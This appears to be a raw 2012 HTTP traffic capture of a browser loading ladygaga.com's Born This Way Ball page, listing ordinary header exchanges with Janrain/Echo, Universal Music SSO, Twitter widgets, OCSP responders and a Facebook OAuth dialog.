Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 13 Sep 2012 21:47:55 GMT
Date: Thu, 01 Nov 2012 01:08:52 GMT
Expires: Fri, 01 Nov 2013 01:08:52 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 21399
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 410008
GET /v1/users/whoami?callback=jQuery16206695502453167785_1352142123131&appkey=prod.umg&sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2Fca9f1ef1fb350d121f136d7a8debdfac&_=1352142140011 HTTP/1.1

Host: api.echoenabled.com
GET /v1/users/whoami?callback=jQuery16206695502453167785_1352142123131&amp;appkey=prod.umg&amp;sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2Fca9f1ef1fb350d121f136d7a8debdfac&amp;_=1352142140011 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset="utf-8"
Connection: close
Server: Yaws 1.92
Date: Mon, 05 Nov 2012 19:02:20 GMT
Content-Length: 75
Content-Type: application/x-javascript; charset=&quot;utf-8&quot;
Access-Control-Allow-Origin: *
X-Echo-Node: jskit@nweb38
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&thinRegistration=true HTTP/1.1

Host: reg.sso.universalmusic.com
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&amp;clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&amp;bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&amp;thinRegistration=true HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: nginx
Date: Mon, 05 Nov 2012 19:02:20 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding, *
Cache-Control: public, max-age=30
Expires: Mon, 05 Nov 2012 19:04:19 GMT
Last-Modified: Mon, 05 Nov 2012 19:03:49 GMT
Etag: 0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: gzip
GET /v1/users/whoami?callback=jQuery1620959077042236176_1352142123383&appkey=prod.umg&sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F5049b78321497758400424e29d8feab4&_=1352142140418 HTTP/1.1

Host: api.echoenabled.com
GET /v1/users/whoami?callback=jQuery1620959077042236176_1352142123383&amp;appkey=prod.umg&amp;sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F5049b78321497758400424e29d8feab4&amp;_=1352142140418 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset="utf-8"
Connection: close
Server: Yaws 1.92
Date: Mon, 05 Nov 2012 19:02:20 GMT
Content-Length: 74
Content-Type: application/x-javascript; charset=&quot;utf-8&quot;
Access-Control-Allow-Origin: *
X-Echo-Node: jskit@nweb5
GET /favicon.ico HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a03+PM; backplane-channel=umg:6bd972b8ebad6299d147f888d254078c; __utma=70702477.1916483056.1352142125.1352142125.1352142125.1; __utmb=70702477.6.10.1352142125; __utmc=70702477; __utmz=70702477.1352142125.1.1.utmcsr=frozen-backside.de|utmccn=(referral)|utmcmd=referral|utmcct=/index.php
HTTP/1.1 200 OK

Content-Type: image/x-icon
Last-Modified: Tue, 31 May 2011 04:21:44 GMT
Accept-Ranges: bytes
Etag: &quot;f1b6e13f4a1fcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 894
Date: Mon, 05 Nov 2012 19:02:20 GMT
Connection: keep-alive
GET /v1/users/whoami?callback=jQuery16202818541952012047_1352142123288&appkey=prod.umg&sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F585ac179036b74a26c2b4d7fc013d9fa&_=1352142141180 HTTP/1.1

Host: api.echoenabled.com
GET /v1/users/whoami?callback=jQuery16202818541952012047_1352142123288&amp;appkey=prod.umg&amp;sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F585ac179036b74a26c2b4d7fc013d9fa&amp;_=1352142141180 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset="utf-8"
Connection: close
Server: Yaws 1.92
Date: Mon, 05 Nov 2012 19:02:21 GMT
Content-Length: 75
Content-Type: application/x-javascript; charset=&quot;utf-8&quot;
Access-Control-Allow-Origin: *
X-Echo-Node: jskit@nweb20
GET /v1/users/whoami?callback=jQuery16202739061588379684_1352142123449&appkey=prod.umg&sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F6bd972b8ebad6299d147f888d254078c&_=1352142141246 HTTP/1.1

Host: api.echoenabled.com
GET /v1/users/whoami?callback=jQuery16202739061588379684_1352142123449&amp;appkey=prod.umg&amp;sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F6bd972b8ebad6299d147f888d254078c&amp;_=1352142141246 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset="utf-8"
Connection: close
Server: Yaws 1.92
Date: Mon, 05 Nov 2012 19:02:21 GMT
Content-Length: 75
Content-Type: application/x-javascript; charset=&quot;utf-8&quot;
Access-Control-Allow-Origin: *
X-Echo-Node: jskit@nweb62
GET /v1/users/whoami?callback=jQuery162049784902880574444_1352142123225&appkey=prod.umg&sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F585ac179036b74a26c2b4d7fc013d9fa&_=1352142141331 HTTP/1.1

Host: api.echoenabled.com
GET /v1/users/whoami?callback=jQuery162049784902880574444_1352142123225&amp;appkey=prod.umg&amp;sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F585ac179036b74a26c2b4d7fc013d9fa&amp;_=1352142141331 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset="utf-8"
Connection: close
Server: Yaws 1.92
Date: Mon, 05 Nov 2012 19:02:21 GMT
Content-Length: 76
Content-Type: application/x-javascript; charset=&quot;utf-8&quot;
Access-Control-Allow-Origin: *
X-Echo-Node: jskit@nweb88
GET /js/tfw/widget/hubclient.js HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
Last-Modified: Fri, 02 Nov 2012 09:35:33 GMT
Etag: &quot;1411999884f419ea8219bf9b531a9c66&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Date: Mon, 05 Nov 2012 19:02:21 GMT
Content-Length: 3260
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&thinRegistration=true HTTP/1.1

Host: reg.sso.universalmusic.com
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&amp;clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&amp;bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&amp;thinRegistration=true HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
If-None-Match: 0
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: nginx
Date: Mon, 05 Nov 2012 19:02:21 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding, *
Cache-Control: public, max-age=29
Expires: Mon, 05 Nov 2012 19:04:20 GMT
Last-Modified: Mon, 05 Nov 2012 19:03:50 GMT
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: gzip
GET /widgets/hub.html HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=1800
Last-Modified: Fri, 02 Nov 2012 09:48:13 GMT
Etag: &quot;b036a791811effc968bfcb43fa6d6910&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7242
Date: Mon, 05 Nov 2012 19:02:22 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /v1/users/whoami?callback=jQuery16209640601019921172_1352142124472&appkey=prod.umg&sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F6bd972b8ebad6299d147f888d254078c&_=1352142141442 HTTP/1.1

Host: api.echoenabled.com
GET /v1/users/whoami?callback=jQuery16209640601019921172_1352142124472&amp;appkey=prod.umg&amp;sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F6bd972b8ebad6299d147f888d254078c&amp;_=1352142141442 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset="utf-8"
Connection: close
Server: Yaws 1.92
Date: Mon, 05 Nov 2012 19:02:21 GMT
Content-Length: 75
Content-Type: application/x-javascript; charset=&quot;utf-8&quot;
Access-Control-Allow-Origin: *
X-Echo-Node: jskit@nweb8
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&thinRegistration=true HTTP/1.1

Host: reg.sso.universalmusic.com
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&amp;clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&amp;bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&amp;thinRegistration=true HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: nginx
Date: Mon, 05 Nov 2012 19:02:22 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding, *
Cache-Control: public, max-age=29
Expires: Mon, 05 Nov 2012 19:04:20 GMT
Last-Modified: Mon, 05 Nov 2012 19:03:50 GMT
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: gzip
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&thinRegistration=true HTTP/1.1

Host: reg.sso.universalmusic.com
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&amp;clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&amp;bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&amp;thinRegistration=true HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: nginx
Date: Mon, 05 Nov 2012 19:02:22 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding, *
Cache-Control: public, max-age=27
Expires: Mon, 05 Nov 2012 19:04:19 GMT
Last-Modified: Mon, 05 Nov 2012 19:03:49 GMT
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: gzip
POST / HTTP/1.1

Host: ocsp.verisign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.0 200 Ok

Content-Type: application/ocsp-response
Last-Modified: Sat, 03 Nov 2012 04:37:48 GMT
Expires: Sat, 10 Nov 2012 04:37:48 GMT
Content-Transfer-Encoding: binary
Content-Length: 1814
Cache-Control: max-age=380126, public, no-transform, must-revalidate
Date: Mon, 05 Nov 2012 19:02:22 GMT
nncoection: close
Connection: Keep-Alive
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&thinRegistration=true HTTP/1.1

Host: reg.sso.universalmusic.com
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&amp;clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&amp;bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&amp;thinRegistration=true HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: nginx
Date: Mon, 05 Nov 2012 19:02:23 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding, *
Cache-Control: public, max-age=11
Expires: Mon, 05 Nov 2012 19:04:02 GMT
Last-Modified: Mon, 05 Nov 2012 19:03:32 GMT
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: gzip
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&thinRegistration=true HTTP/1.1

Host: reg.sso.universalmusic.com
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&amp;clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&amp;bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&amp;thinRegistration=true HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: nginx
Date: Mon, 05 Nov 2012 19:02:23 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding, *
Cache-Control: public, max-age=28
Expires: Mon, 05 Nov 2012 19:04:20 GMT
Last-Modified: Mon, 05 Nov 2012 19:03:50 GMT
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: gzip
POST / HTTP/1.1

Host: ocsp.usertrust.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Date: Mon, 05 Nov 2012 19:02:23 GMT
Server: Apache
Last-Modified: Mon, 05 Nov 2012 08:18:46 GMT
Expires: Fri, 09 Nov 2012 08:18:46 GMT
Etag: 90BB0BE8926BD9F0F77CFAC2E8A139CAF7B46D1A
Cache-Control: max-age=306382,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: h6edcaocsp2
Content-Length: 471
Connection: close
POST / HTTP/1.1

Host: ocsp.entrust.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 103
Content-Type: application/ocsp-request
HTTP/1.0 200 OK

Content-Type: application/ocsp-response
Content-Transfer-Encoding: Binary
Content-Length: 1938
Connection: Close
GET /widgets/hub.html HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=1800
Last-Modified: Fri, 02 Nov 2012 09:48:13 GMT
Etag: &quot;b036a791811effc968bfcb43fa6d6910&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7242
Date: Mon, 05 Nov 2012 19:02:24 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /dialog/oauth?client_id=34617625687&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.ladygaga.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D13%23cb%3Dfceb358de9c80c%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff297d405274a64e%26domain%3Dwww.ladygaga.com%26relation%3Dparent&sdk=joey HTTP/1.1

Host: www.facebook.com
